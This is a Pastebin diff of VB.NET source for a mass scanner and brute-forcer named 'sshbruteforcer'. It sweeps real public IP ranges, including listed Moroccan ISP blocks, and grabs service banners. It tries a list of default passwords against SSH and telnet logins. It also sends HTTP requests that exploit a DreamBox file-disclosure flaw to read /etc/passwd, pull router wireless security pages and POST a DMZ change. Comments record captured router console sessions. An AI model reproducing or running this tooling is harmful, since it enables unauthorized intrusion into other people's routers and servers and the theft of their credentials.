View difference between Paste ID: <a href="/SrbtpaS5">SrbtpaS5</a> and <a href="/taLZMYBQ">taLZMYBQ</a> - Pastebin.com

View difference between Paste ID: SrbtpaS5 and taLZMYBQ

SHOW: | | - or go back to the newest paste.

Imports System.Collections
'ArrayList
Imports System.Collections.Generic
Imports System.IO
Imports System.Linq
Imports System.Text
Imports System.Threading

Imports System.Net.Sockets
Imports System.Net

Imports Tamir.SharpSsh

'TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
'JA
Namespace sshbruteforcer
	Public NotInheritable Class IPAddressMask
		Private Sub New()
		End Sub
		Private Shared Sub CheckIPVersion(ipAddress As IPAddress, mask As IPAddress, ByRef addressBytes As Byte(), ByRef maskBytes As Byte())
			If mask Is Nothing Then
				Throw New ArgumentException()
			End If

			addressBytes = ipAddress.GetAddressBytes()
			maskBytes = mask.GetAddressBytes()

			If addressBytes.Length <> maskBytes.Length Then
				Throw New ArgumentException("The address and mask don't use the same IP standard")
			End If
		End Sub

		<System.Runtime.CompilerServices.Extension> _
		Public Shared Function [And](ipAddress As IPAddress, mask As IPAddress) As IPAddress
			Dim addressBytes As Byte()
			Dim maskBytes As Byte()
			CheckIPVersion(ipAddress, mask, addressBytes, maskBytes)

			Dim resultBytes As Byte() = New Byte(addressBytes.Length - 1) {}
			For i As Integer = 0 To addressBytes.Length - 1
				resultBytes(i) = CByte(addressBytes(i) And maskBytes(i))
			Next

			Return New IPAddress(resultBytes)
		End Function

		Private Shared empty As IPAddress = IPAddress.Parse("0.0.0.0")
		Private Shared intranetMask1 As IPAddress = IPAddress.Parse("10.255.255.255")
		Private Shared intranetMask2 As IPAddress = IPAddress.Parse("172.16.0.0")
		Private Shared intranetMask3 As IPAddress = IPAddress.Parse("172.31.255.255")
		Private Shared intranetMask4 As IPAddress = IPAddress.Parse("192.168.255.255")
		''' <summary>
		''' Retuns true if the ip address is one of the following
		''' IANA-reserved private IPv4 network ranges (from http://en.wikipedia.org/wiki/IP_address)
		'''  Start 	      End 	
		'''  10.0.0.0 	    10.255.255.255 	
		'''  172.16.0.0 	  172.31.255.255 	
		'''  192.168.0.0   192.168.255.255 
		''' </summary>
		''' <returns></returns>
		<System.Runtime.CompilerServices.Extension> _
		Public Shared Function IsOnIntranet(ipAddress__1 As IPAddress) As Boolean
			If empty.Equals(ipAddress__1) Then
				Return False
			End If
			Dim onIntranet As Boolean = IPAddress.IsLoopback(ipAddress__1)
			onIntranet = onIntranet OrElse ipAddress__1.Equals(ipAddress__1.[And](intranetMask1))
			'10.255.255.255
			onIntranet = onIntranet OrElse ipAddress__1.Equals(ipAddress__1.[And](intranetMask4))
			'''/192.168.255.255
			onIntranet = onIntranet OrElse (intranetMask2.Equals(ipAddress__1.[And](intranetMask2)) AndAlso ipAddress__1.Equals(ipAddress__1.[And](intranetMask3)))

			Return onIntranet
		End Function
	End Class

	Public Class Program
		'(string ipaddress)
		'    public Socket Sock_scan;


		Shared m_byBuff As [Byte]() = New [Byte](32766) {}

		Private Max_thread As Integer = 50

		Private Shared callbackProc As AsyncCallback
		Private Shared m_ListOptions As New ArrayList()
		Shared IAC As [Char] = Convert.ToChar(255)
		Shared [DO] As [Char] = Convert.ToChar(253)
		Shared DONT As [Char] = Convert.ToChar(254)
		Shared WILL As [Char] = Convert.ToChar(251)
		Shared WONT As [Char] = Convert.ToChar(252)
		Shared SB As [Char] = Convert.ToChar(250)
		Shared SE As [Char] = Convert.ToChar(240)

		' ManualResetEvent instances signal completion.
		Private Shared connectDone As New ManualResetEvent(False)
		Private Shared sendDone As New ManualResetEvent(False)
		Private Shared receiveDone As New ManualResetEvent(False)
		' The response from the remote device.
		Private Shared response As [String] = [String].Empty

		Public Shared cpt_th As New Compteur_thread()




		Private ipaddress As String
		Private portx As Integer

		'public static IPAddress address = IPAddress.Parse("10.20.10.5");
		'bool onTheIntranet = address.IsOnIntranet();


		Public Sub New(ipaddress As String, portx As Integer)
			Me.ipaddress = ipaddress
				'this.cpt_th = new Compteur_thread();
			Me.portx = portx
		End Sub

		Public Shared Sub Main(args As String())
			Dim p1 As New Program("go", 5)
			'p1.go();
			Dim th_Scan_ip_port As New Thread(New ThreadStart(AddressOf p1.go))
			th_Scan_ip_port.Start()
		End Sub

		Public Sub go()
			'    CScanner_IP s;
			'    s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);


			Dim t_IP_start As Byte()
			Dim t_IP_end As Byte()

			'     IPAddress MyExternalIp = GetExternalIp();
			'     Console.WriteLine("MyExternalIp=" + MyExternalIp);
			'     string[] s_ip = MyExternalIp.ToString().Split('.');
			'     string[] s2_ip = MyExternalIp.ToString().Split('.');

			Dim adresse_en_cours As String


			Dim Port_start As Integer = 22
			Dim Port_end As Integer = 23




			Dim th_Lance_Scan As Thread
			Dim th_Scan_ip_port As Thread


			AddHandler cpt_th.lancer_thread, New Program.Compteur_thread.Lancer_Thread(AddressOf Lancer_Thread)

			'Decoupe IP debut
			'196.28.249.---    Burkina Faso
			'41.202.193.---    Cameroun
			'195.24.206.---    Cameroun
			'90.4.125.---      France
			'202.152.43.---    IndonÃ©sie
			'202.159.126.---   IndonÃ©sie

			'http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=

			'41.214
			Dim s_ip As String() = {"41", "141", "1", "1"}
			'zawi    41.250.195.107 
			'string[] s_ip={"41", "250", "75", "1"};    //zawi    41.250.195.107  
			'string[] s_ip = { "81", "192", "102", "1" };  //Maroc telecom ip fixe   81.192.102.8: netpeas     81.192.152.205: cnia
			'41.248.0
			'41.248.158.92
			'string[] s_ip = { "41", "141", "235", "1" };    //example:  41.141.235.82
			'41.141.55.16  Agadir
			'41.143.11.192
			'41.250.59.57
			'41.250.118.53
			'41.250.129.142
			'string[] s_ip = { "41", "250", "82", "159" };    //example:   41.250.82.159
			'        string[] s_ip = { "196", "12", "232", "1" };       //196.12.232.120 <snip> location
			'196.206.198.10    Rabat
			'string[] s_ip = { "41", "250", "136", "1" };    //<snip> location   41.250.136.238
			'string[] s_ip = { "41", "250", "150", "18" }; 
			'string[] s_ip = { "41", "250", "195", "1"};    //zawi    41.250.195.107
			'string[] s_ip = { "41", "251", "16", "1" };    //<snip> location   41.251.16.238
			'string[] s_ip = { "91", "121", "78", "55" };    //OVH   91.121.78.55
			'http://www.robtex.com/dns/adsl.iam.net.ma.html#records
			'string[] s_ip = { "196", "217", "240", "1" };    //MENARA (mail)
			'string[] s_ip = { "81", "192", "48", "1" };    //MENARA (dns)
			'string[] s_ip = { "212", "217", "0", "1" };    //MENARA
			t_IP_start = New Byte(3) {}
			'     for (int i = 0; i < s_ip.Length; i++)
			'         t_IP_start[i] = Convert.ToByte(s_ip[i]);
			t_IP_start(0) = Convert.ToByte(s_ip(0))
			t_IP_start(1) = Convert.ToByte(s_ip(1))
			t_IP_start(2) = Convert.ToByte(s_ip(2))
			t_IP_start(3) = Convert.ToByte(s_ip(3))
			't_IP_start[3] = Convert.ToByte("1");

			'string[] s2_ip={"41", "250", "149", "254"}; //zawi
			'    string[] s2_ip={"41", "251", "254", "254"}; //zawi
			Dim s2_ip As String() = {"196", "12", "233", "255"}
			'196.12.232.120 <snip> location
			'string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location     41.251.35.72
			'string[] s2_ip = { "41", "141", "235", "254" };    //<snip> location  41.141.235.82
			'string[] s2_ip = { "91", "121", "78", "55" };    //OVH   91.121.78.55
			'            string[] s2_ip = { "41", "250", "150", "19" };
			'string[] s2_ip = { "196", "217", "255", "255" };    //MENARA (mail)
			'string[] s2_ip = { "81", "192", "63", "255" };    //MENARA (dns)
			'string[] s2_ip = { "212", "217", "31", "255" };    //MENARA
			t_IP_end = New Byte(3) {}
			'     for (int i = 0; i < s_ip.Length; i++)
			'         t_IP_end[i] = Convert.ToByte(s2_ip[i]);
			t_IP_end(0) = Convert.ToByte(s2_ip(0))
			t_IP_end(1) = Convert.ToByte(s2_ip(1))
			t_IP_end(2) = Convert.ToByte(s2_ip(2))
			t_IP_end(3) = Convert.ToByte(s2_ip(3))
			't_IP_end[3] = Convert.ToByte("255");

			'          private void Lancer_Scan()
			'		    {
			Dim i As Integer = 0, j As Integer = 0, k As Integer = 0, l As Integer = 0
			Dim max_j As Integer = 0, max_k As Integer = 0, max_l As Integer = 0
			Dim start_j As Boolean = True
			Dim start_k As Boolean = True
			Dim start_l As Boolean = True

			Try

				'    Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
				'Console.WriteLine("Debut du scan");
				'				    if(init_scan != null)init_scan(this, infs);

				For i = t_IP_start(0) To t_IP_end(0)
					If (start_j) AndAlso (t_IP_start(0) <> t_IP_end(0)) Then
						j = t_IP_start(1)
						max_j = 255
					End If
					If (start_j) AndAlso (t_IP_start(0) = t_IP_end(0)) Then
						j = t_IP_start(1)
						max_j = t_IP_end(1)
					End If

					If (Not start_j) AndAlso (i <> t_IP_end(0)) Then
						j = 0
						max_j = 255
					End If
					If (Not start_j) AndAlso (i = t_IP_end(0)) Then
						j = 0
						max_j = t_IP_end(1)
					End If

					While j <= max_j

						If (start_k) AndAlso (t_IP_start(1) <> t_IP_end(1)) Then
							k = t_IP_start(2)
							max_k = 255
						End If
						If (start_k) AndAlso (t_IP_start(1) = t_IP_end(1)) Then
							k = t_IP_start(2)
							max_k = t_IP_end(2)
						End If

						If (Not start_k) AndAlso (j <> t_IP_end(1)) Then
							k = 0
							max_k = 255
						End If
						If (Not start_k) AndAlso (j = t_IP_end(1)) Then
							k = 0
							max_k = t_IP_end(2)
						End If

						While k <= max_k

							If (start_l) AndAlso (t_IP_start(2) <> t_IP_end(2)) Then
								l = t_IP_start(3)
								max_l = 255
							End If
							If (start_l) AndAlso (t_IP_start(2) = t_IP_end(2)) Then
								l = t_IP_start(3)
								max_l = t_IP_end(3)
							End If

							If (Not start_l) AndAlso (k <> t_IP_end(2)) Then
								l = 0
								max_l = 255
							End If
							If (Not start_l) AndAlso (k = t_IP_end(2)) Then
								l = 0
								max_l = t_IP_end(3)
							End If

							While l <= max_l
								adresse_en_cours = i.ToString() & "." & j.ToString() & "." & k.ToString() & "." & l.ToString()

								'    Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
								'    Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);

								'    if(debut_scan != null)
								'	    debut_scan(this, info);

								'
'								    Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
'

								Dim nb_thread As Integer = 0
								For port As Integer = Port_start To Port_end
									'
'                                        Scanner_IP_Port(adresse_en_cours, port);
'                                        th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
'                                        th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
'                                        th_Scan_ip_port.Start();
'                                        


									Dim sc As New Scanner_ip_port(adresse_en_cours, port, cpt_th)

									Dim t As New Thread(New ThreadStart(AddressOf sc.Scanner_IP_Port))
									t.Start()

									cpt_th.Incrementer()
									nb_thread = 0
									cpt_th.Nb_thread(nb_thread)
									If nb_thread = Me.Max_thread Then
										SyncLock Me
											'    Console.WriteLine("DEBUG WAIT1");
											Monitor.Wait(Me)
										End SyncLock
									End If
								Next

								'http scan

								Dim sc2 As New Scanner_ip_port(adresse_en_cours, 80, cpt_th)

								Dim t2 As New Thread(New ThreadStart(AddressOf sc2.Scanner_IP_Port))
								t2.Start()

								cpt_th.Incrementer()
								nb_thread = 0
								cpt_th.Nb_thread(nb_thread)
								If nb_thread = Me.Max_thread Then
									SyncLock Me
										'    Console.WriteLine("DEBUG WAIT2");
										Monitor.Wait(Me)
									End SyncLock
								End If


								'https scan

								Dim sc3 As New Scanner_ip_port(adresse_en_cours, 443, cpt_th)

								Dim t3 As New Thread(New ThreadStart(AddressOf sc3.Scanner_IP_Port))
								t3.Start()

								cpt_th.Incrementer()
								nb_thread = 0
								cpt_th.Nb_thread(nb_thread)
								If nb_thread = Me.Max_thread Then
									SyncLock Me
										'Console.WriteLine("DEBUG WAIT2");
										Monitor.Wait(Me)
									End SyncLock
								End If

								'VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
								Dim sc1720 As New Scanner_ip_port(adresse_en_cours, 1720, cpt_th)

								Dim t1720 As New Thread(New ThreadStart(AddressOf sc1720.Scanner_IP_Port))
								t1720.Start()

								cpt_th.Incrementer()
								nb_thread = 0
								cpt_th.Nb_thread(nb_thread)
								If nb_thread = Me.Max_thread Then
									SyncLock Me
										'Console.WriteLine("DEBUG WAIT2");
										Monitor.Wait(Me)
									End SyncLock
								End If


								'RDP scan
								Dim sc3389 As New Scanner_ip_port(adresse_en_cours, 3389, cpt_th)

								Dim t3389 As New Thread(New ThreadStart(AddressOf sc3389.Scanner_IP_Port))
								t3389.Start()

								cpt_th.Incrementer()
								nb_thread = 0
								cpt_th.Nb_thread(nb_thread)
								If nb_thread = Me.Max_thread Then
									SyncLock Me
										'Console.WriteLine("DEBUG WAIT2");
										Monitor.Wait(Me)
									End SyncLock

									'
'								    sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
'								    th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
'								    th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
'								    th_Scan_ip_port.Start();						
'								
'								    cpt_th.Incrementer();
'								    int nb_thread = 0;
'								    cpt_th.Nb_thread(out nb_thread);
'


									'							
'								    if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
'								    {
'									    Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
'									    if(this.maj_prg_bar != null)
'										    this.maj_prg_bar(this, ifs);
'
'									    this.pas_a_atteindre += this.pas_progress;
'								    }
'
'								    i_progress++;
'    


									'                                    
'                                    if(nb_thread == this.Max_thread)
'								    {
'									    lock(this)
'									    {
'										    Monitor.Wait(this);
'									    }
'
'									    if(this.ARRETER_SCAN)
'									    {
'										    Info_Scan inf_s = new Info_Scan("", 0, "", "ArrÃªt du scan");
'										    if(fin_scan != null)fin_scan(this, inf_s);
'
'										    return;                                        
'									    }
'								    }
'

								End If
								l += 1
							End While
							start_l = False
							k += 1
						End While
						start_k = False
						j += 1
					End While
					start_j = False

					'    Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
					'    if(fin_scan != null)fin_scan(this, inf);
				Next
			Catch e As Exception
				Console.WriteLine("BADBOY: " & e.ToString())
			End Try
			'		    }





		End Sub

		Public Class Scanner_ip_port
			Private adresse_ip As String
			Private port As Integer

			Private cpt_th As Compteur_thread




			Public Sub New(adresse_ip As String, port As Integer, cpt_th As Compteur_thread)
				Me.adresse_ip = adresse_ip
				Me.port = port
				Me.cpt_th = cpt_th
			End Sub

			Public Sub Scanner_IP_Port()
				Try
					'    Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());

					Dim adresseIP As IPAddress = IPAddress.Parse(adresse_ip)
					Dim ip As New IPEndPoint(adresseIP, port)
					Dim Sock_scan As New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
					'Sock_scan.Blocking = false;
					' Connect to the remote endpoint.
					Sock_scan.Connect(ip)
					'asynchronous     
'                    try
'                    {
'                        Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
'                    }
'                    catch (Exception e)
'                    {
'                        Console.WriteLine("DEBUG BEGINCONNECT: "+e);
'                    }
'                    Console.WriteLine("DEBUG RACHEL");
'                    connectDone.WaitOne(1000);
'               asynchronous


					'    Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
					Console.WriteLine("{0} -> Port {1} open", adresse_ip, port)
					'    if (scan_en_cours != null) scan_en_cours(this, info);


					'
'                    Byte[] RecvBytes = new Byte[256];
'                    String strRetPage = null;
'                    Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
'                    Encoding ASCII = Encoding.ASCII;
'                    strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
'
'                    while (bytes > 0)
'                    {
'                        bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
'                        strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
'                    }
'                    Console.WriteLine(strRetPage);
'                    

					Dim data As Byte() = New Byte(4095) {}
					Dim banner As String
					Dim recv As Integer
					'
'                    NetworkStream ns = new NetworkStream(Sock_scan);
'                    if (ns.CanRead)
'                    {
'                        recv = ns.Read(data, 0, data.Length);
'                        stringData = Encoding.ASCII.GetString(data, 0, recv);
'                        Console.WriteLine("== BANNER START =======================");
'                        Console.WriteLine(stringData);
'                        Console.WriteLine("== BANNER END =======================");
'                    }
'                    else
'                    {
'                        Console.WriteLine("Error: Can't read from this socket");
'                        ns.Close();
'                    //    server.Close();
'                    //    return;
'                    }
'                    


					' Receive the response from the remote device.
					'synchro

					recv = Sock_scan.Receive(data)
					banner = Encoding.ASCII.GetString(data, 0, recv)
					Console.WriteLine("{0}:{1} -> BANNER01: " & banner, adresse_ip, port)

					If banner = "" Then
						recv = Sock_scan.Receive(data)
						banner = Encoding.ASCII.GetString(data, 0, recv)
						Console.WriteLine("{0}:{1} -> BANNER02: " & banner, adresse_ip, port)
					End If

					'synchro


					'asynchro
'                    Receive(Sock_scan);
'                    receiveDone.WaitOne(1000);
'                    // Write the response to the console.
'                    Console.WriteLine("Response received : {0}", response);
'                        banner = response;
'                    asynchro








					If port = 21 Then
							'    ftptry(adresse_ip);              
						Sock_scan.Close()
					End If
					If port = 22 Then
							'   sshtry(adresse_ip);
						Sock_scan.Close()
					End If
					If port = 23 Then

						If banner.Contains("ogin:") OrElse banner.Contains("assword:") OrElse banner.Contains("Connection was denied by remote host according to ACL!") Then
						Else
							recv = Sock_scan.Receive(data)
							banner = Encoding.ASCII.GetString(data, 0, recv)
							Console.WriteLine("{0}:{1} -> BANNER03: " & banner, adresse_ip, port)

							If banner.Contains("ogin:") OrElse banner.Contains("assword:") Then
							Else
								recv = Sock_scan.Receive(data)
								banner = Encoding.ASCII.GetString(data, 0, recv)
								Console.WriteLine("{0}:{1} -> BANNER04: " & banner, adresse_ip, port)
							End If
						End If
						Sock_scan.Close()

						If banner.Contains("Connection was denied by remote host according to ACL!") Then
						Else
							telnettry(adresse_ip, banner)
						End If
					End If
					If port = 80 Then
						Dim ResponseText As String = ""
						Dim SR As StreamReader = Nothing
						Dim response As HttpWebResponse = Nothing
						Dim request As HttpWebRequest
						request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/password.cgi"), HttpWebRequest)
						'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

						request.Method = "GET"
						'request.ContentType = "application/xml";

						response = DirectCast(request.GetResponse(), HttpWebResponse)
						SR = New StreamReader(response.GetResponseStream())
						ResponseText = SR.ReadToEnd()

						Console.WriteLine(String.Format("password.cgi response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
						Console.WriteLine(String.Format("password.cgi response headers : [{0}]", response.Headers.ToString()))
						Console.WriteLine(String.Format("password.cgi response received : [{0}]", ResponseText))

						'***********************************************************************************************************************************************
						'DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
						'http://www.exploit-db.com/exploits/18079/
						request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/file?file=/etc/passwd"), HttpWebRequest)
						'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

						request.Method = "GET"
						'request.ContentType = "application/xml";

						response = DirectCast(request.GetResponse(), HttpWebResponse)
						SR = New StreamReader(response.GetResponseStream())
						ResponseText = SR.ReadToEnd()

						Console.WriteLine(String.Format("DreamBox RFI response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
						Console.WriteLine(String.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()))
						Console.WriteLine(String.Format("DreamBox RFI response received : [{0}]", ResponseText))


						'***********************************************************************************************************************************************
						'108M Wireless ADSL2+ Router
						'http://41.250.9.119/wlcfg.html   //Wireless/Basic
						'http://41.250.9.119/wlsecurity.html   //Wireless/Security

						request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/wlcfg.html"), HttpWebRequest)
						'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

						request.Method = "GET"
						'request.ContentType = "application/xml";

						response = DirectCast(request.GetResponse(), HttpWebResponse)
						SR = New StreamReader(response.GetResponseStream())
						ResponseText = SR.ReadToEnd()

						Console.WriteLine(String.Format("wlcfg.html response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
						Console.WriteLine(String.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()))
						Console.WriteLine(String.Format("wlcfg.html response received : [{0}]", ResponseText))
						'***********************************************************************************************************************************************
						request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/wlsecurity.html"), HttpWebRequest)
						'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

						request.Method = "GET"
						'request.ContentType = "application/xml";

						response = DirectCast(request.GetResponse(), HttpWebResponse)
						SR = New StreamReader(response.GetResponseStream())
						ResponseText = SR.ReadToEnd()

						Console.WriteLine(String.Format("wlsecurity.html response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
						Console.WriteLine(String.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()))
						Console.WriteLine(String.Format("wlsecurity.html response received : [{0}]", ResponseText))
						'***********************************************************************************************************************************************
						'http://41.250.9.119/scdmz.html    //DMZ
						request = DirectCast(HttpWebRequest.Create("http://" & adresse_ip & "/scdmz.html?address=192.168.1.2"), HttpWebRequest)
						'dmzAddr
						'ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
						request.Method = "POST"
						'request.ContentType = "application/xml";

						Dim postData As String = "address=192.168.1.2"
						Dim byteArray As Byte() = Encoding.UTF8.GetBytes(postData)
						request.ContentLength = byteArray.Length

						Dim dataStream As Stream = request.GetRequestStream()
						dataStream.Write(byteArray, 0, byteArray.Length)
						dataStream.Close()

						response = DirectCast(request.GetResponse(), HttpWebResponse)
						SR = New StreamReader(response.GetResponseStream())
						ResponseText = SR.ReadToEnd()

						Console.WriteLine(String.Format("scdmz.html response status : [{0}]", Convert.ToString(response.StatusCode) & " - " & response.StatusDescription))
						Console.WriteLine(String.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()))


						Console.WriteLine(String.Format("scdmz.html response received : [{0}]", ResponseText))
					End If


						'Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
					cpt_th.Decrementer()
				Catch e As Exception
					'
'                        Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
'                        if (scan_en_cours != null) scan_en_cours(this, info);                        
'                    

						'    Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
						'    Console.WriteLine("EXCEPT: " + e);
					cpt_th.Decrementer()
				End Try
			End Sub
		End Class

			'conexant telnet
			'http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
			'123123
		Shared passwords As New List(Of String)() From { _
			"admin", _
			"1234", _
			"cisco", _
			"", _
			"Admin", _
			"root", _
			"toor", _
			"default", _
			"azerty", _
			"qwerty", _
			"12345", _
			"123456", _
			"1234567", _
			"12345678", _
			"dreambox", _
			"test", _
			"user", _
			"demo", _
			"ZXDSL", _
			"password", _
			"agadir", _
			"menara", _
			"Menara", _
			"maroc", _
			"vodafone", _
			"epicrouter", _
			"abc123", _
			"monkey", _
			"letmein", _
			"trustno1", _
			"dragon", _
			"baseball", _
			"111111", _
			"iloveyou", _
			"master", _
			"sunshine", _
			"ashley", _
			"bailey", _
			"passw0rd", _
			"shadow", _
			"123123", _
			"654321", _
			"superman", _
			"qazwsx", _
			"michael", _
			"football" _
		}

		Public Shared Sub sshtry(myip As String)
			Console.WriteLine("sshtry")
			'    sshtry("test");         
			For Each password As String In passwords
				Try
					Console.Write("-Connecting...")
					Dim ssh As New SshStream(myip, "root", password)
					Console.WriteLine("{0} -> SSH PASSWORD IS: {1}" & vbLf, myip, password)
					Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac)
					Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion)
					Console.WriteLine("-Use the 'exit' command to disconnect.")
					Console.WriteLine()

					'Sets the end of response character
					ssh.Prompt = "#"
					'Remove terminal emulation characters
					ssh.RemoveTerminalEmulationCharacters = True

					'Reads the initial response from the SSH stream
					'    Console.Write(ssh.ReadResponse());



					'''/Send commands from the user
					'while (true)
					'{
					'    string command = Console.ReadLine();
					'    if (command.ToLower().Equals("exit"))
					'        break;

					'    //Write command to the SSH stream
					'    ssh.Write(command);
					'    //Read response from the SSH stream
					'    Console.Write(ssh.ReadResponse());
					'}
					ssh.Close()
					'Close the connection
					Console.WriteLine("Connection closed.")
				Catch e As Exception
					Dim response As String = String.Empty
					response = e.Message
					If response = "Auth fail" Then
							'    sshtry("12345");
						Console.Write("{0} -> bad ssh password: {1}" & vbLf, myip, password)
					Else
						Console.WriteLine("{0} SSH ERROR -> " & e.Message, myip)
					End If
				End Try
			Next
		End Sub

		Public Shared Sub telnettry(myip As String, banner As String)
			Console.WriteLine("telnettry")

			Dim Sock_scan As Socket

			Dim data As Byte() = New Byte(1023) {}
			Dim stringdata As String = ""
			Dim recv As Integer

			'try
			'{

			Dim adresseIP As IPAddress = IPAddress.Parse(myip)
			Dim ip As New IPEndPoint(adresseIP, 23)
			'                Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
			'Sock_scan.Blocking = false; // This is a non blocking IO

			'
'                // Assign Callback function to read from Asyncronous Socket
'                callbackProc = new AsyncCallback(ConnectCallback);
'                // Begin Asyncronous Connection
'                Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
'                


			'                Sock_scan.Connect(ip);
			'recv = Sock_scan.Receive(data);
			'Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);

			'}
			'catch (Exception eeeee)
			'{
			'    Console.WriteLine(eeeee.Message);
			'}            

			Dim strRetPage As [String] = Nothing
			Dim bytes As Int32
			Dim RecvBytes As [Byte]() = New [Byte](255) {}
			Dim ASCII As Encoding = Encoding.ASCII
			'
'            bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
'            
'            strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
'
'            while (bytes > 0)
'            {
'                bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
'                strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
'            }
'            Console.WriteLine("Banner telnet: " + strRetPage);
'            


			If banner.Contains("ogin:") OrElse banner.Contains("sername:") Then
				Sock_scan = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
				Sock_scan.Connect(ip)

				recv = Sock_scan.Receive(data)
				stringdata = Encoding.ASCII.GetString(data, 0, recv)
				Console.WriteLine("{0} -> BANNERLOGIN: " & stringdata, myip)

				'#Region "BANNERS01"
				'Exemple: Vulcan
				'<BAD SEQUENCE>
				'Copyright (c) 2001-2003 by Conexant, Inc.

				'login: 01
				'password:
				'Echec Login
				'login:
				'login: 02
				'password:
				'Echec Login
				'login: 03
				'password:
				'Echec Login
				'login:
				'login: 04
				'password:
				'Echec Login
				'login: 05
				'password:
				'Echec Login


				'Perte de la connexion Ã  l'hÃ´te.
				'</BAD SEQUENCE>

				'************************************************************************************
				'                           CONEXANT SYSTEMS, INC.
				'   ACCESS RUNNER ADSL CONSOLE PORT  3.21

				'LOGON PASSWORD>
				'(epicrouter)
				'
				'
				'                                           CONEXANT SYSTEMS, INC.
				'                   ACCESS RUNNER ADSL CONSOLE PORT  3.21


				'                                   MAIN MENU

				'                        0. Select VC Adaptor
				'                        1. Display Firmware Version
				'                        2. Password Setup
				'                        3. Connection Status
				'                        4. Network Setup
				'                        5. ADSL Setup
				'                        6. System Maintenance




				'                        S. Save Settings and Reset Unit
				'                        R. Reset Without Saving Changes
				'                        Q. Quit Session

				'                        Enter your selection below:

				'>>>
				'(2)
				'                           CONEXANT SYSTEMS, INC.
				'                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

				'                              Password Setup


				'                        1. Change Administrative Password
				'                        2. Change PPP User Name and Password
				'                        3. Change User Password








				'                              Press 'B' to go Back
				'                          Press 'M' to go to Main Menu
				'                           Enter your selection below



				'>>>

				'(1)
				'                           CONEXANT SYSTEMS, INC.
				'                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

				'                       Change Administrative Password


				'                        Enter New Admin Password:
				'              (no less than 8 characters, '&' is not accepted)
				'                              (Press ESC to quit)

				'>>>
				'
				'                           CONEXANT SYSTEMS, INC.
				'                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

				'                       Confirm Administrative Password


				'                        Re-enter New Admin Password:
				'              (no less than 8 characters, '&' is not accepted)
				'                              (Press ESC to quit)

				'>>>

				'                           CONEXANT SYSTEMS, INC.
				'                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

				'                              Password Setup


				'                        1. Change Administrative Password
